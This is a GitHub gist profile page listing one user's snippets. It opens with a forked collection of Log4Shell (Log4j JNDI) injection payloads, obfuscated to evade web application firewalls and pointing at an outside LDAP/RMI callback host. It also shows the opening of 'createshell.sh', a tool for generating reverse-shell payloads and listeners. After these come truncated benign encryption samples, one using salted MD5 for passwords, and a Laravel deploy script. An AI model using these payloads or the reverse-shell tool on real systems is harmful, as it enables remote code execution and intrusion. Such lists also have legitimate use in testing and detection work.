Skip to content

Instantly share code, notes, and snippets.

View danieljs777's full-sized avatar

Daniel Jordão danieljs777

7 followers · 16 following
View GitHub Profile
@danieljs777
danieljs777 / Log4j Payloads
Created December 15, 2021 18:33 — forked from ZephrFish/Log4j Payloads
Collection of WAF evasion payloads
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
@danieljs777
danieljs777 / createshell.sh
Last active March 26, 2021 22:52
CreateShell v0.1 - A fast way to generate payloads and open listeners for reverse shells
#!/bin/bash
if [ $# -eq 0 ]
then
echo "##############################################################";
echo "# CreateShell v0.1 - A fast way to generate payloads and open listeners for reverse shells";
echo "# By Daniel (daniel@zillius.com.br) ";
echo "# Usage: createshell.sh lhost lport payload ";
echo "#";
echo "# MSF short payloads : ";
echo "# [php|jsp|war|asp|python|bash|perl|linux32|linux64|win32|win64|osx]";
@danieljs777
danieljs777 / encryption_sample.php
Created April 23, 2020 15:04
PHP Encryption Sample
<?php
$token = "2";
$cipher_method = 'aes-128-ctr';
$enc_key = openssl_digest(php_uname(), 'SHA256', TRUE);
$enc_iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length($cipher_method));
$crypted_token = openssl_encrypt($token, $cipher_method, $enc_key, 0, $enc_iv) . "::" . bin2hex($enc_iv);
unset($token, $cipher_method, $enc_key, $enc_iv);
dump($crypted_token);
@danieljs777
danieljs777 / JavaPBEKeySpecEncryption.java
Last active January 30, 2020 02:54
Java Password Encryption with PBE Key
package JavaPBEKeySpecEncryption;
/**
*
* @author daniel
*/
import java.io.Console;
import java.io.IOException;
import java.security.*;
import java.io.ByteArrayOutputStream;
@danieljs777
danieljs777 / PasswordEncryption.java
Last active July 25, 2022 05:52
Encryting passwords with MD5 hash and salt in Java.
package PasswordEncryption;
/**
*
* @author daniel
*/
import java.io.Console;
import java.io.IOException;
import java.security.*;
import java.io.ByteArrayOutputStream;
@danieljs777
danieljs777 / deploy_laravel.sh
Created August 28, 2019 14:25
Script for deploying laravel projects with composer and npm
#!/bin/bash
skip_composer=0
skip_npm=0
for arg in "$@"
do
if [ "$arg" == "--skip-composer" ]
then
skip_composer=1
fi